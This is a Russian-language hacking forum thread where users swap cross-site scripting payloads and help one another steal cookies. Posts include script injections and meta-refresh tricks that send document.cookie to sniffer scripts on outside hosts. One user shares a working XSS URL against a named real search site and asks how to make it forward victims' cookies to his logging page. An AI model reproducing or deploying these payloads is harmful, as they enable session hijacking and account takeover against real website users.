|
xSs как отправить кукисы на
пробую так!
Код:
ssss"><script>alert('xss')</script>пробую так Код:
ssss"><script>alert(document.cookie)</script>пробуё так Код:
ssss"><script>img = new Image(); img.src = "http://www.klub.h10.ru/snif/s.php?"+document.cookie;</script>как отправить кукисы на http://www.klub.h10.ru/snif/s.php |
скорее всего стоит ограничение на длину строки
|
Исходный код смотри - что в нем получается.
|
попробуй так "><script src=http://site.com/js.js></script>
в js.js - img=new Image();img.src="http://sniffer.ru/s.gif?"+document.cookie; |
дай линк на сайт.
очень часто нужно писать +escape(document.cookie); |
может и мне кто поможет? нашол вот такой xss
<meta http-equiv=Refresh content=0;url=javascript:alert("OK")> пишеш <meta http-equiv=Refresh content=0;url=javascript:document.cookie> показывает куки... делаю ссылку на фаил js.js на снифер ничего не приходит :( ссылку делаю вот так <meta http-equiv=Refresh content=0;url=javascript:http://my_site/js.js> и вот так вот пробывал <meta http-equiv=Refresh content=0;url=javascript:new Image();img.src="http://my_site/s.gif?"+document.cookie;> может я неправильно ссылку ставлю? |
без javascript в url
и на хтмл страницу со скриптом |
Цитата:
|
народ вот xss на апорт.ру а как сделать чтобы она кукисы на http://www.klub.h10.ru/snif/s.php отсылала? логи смотреть тут http://www.klub.h10.ru/snif/log.php
помогите кто поможет таму + кому помог я тот мне + =) Код:
http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert%28%27XSS_by_Chakir%27%29%3C%2Fscript%3E |
подскажте как провести xss, если все что идёт после "/" режется?
|
| Время: 13:32 |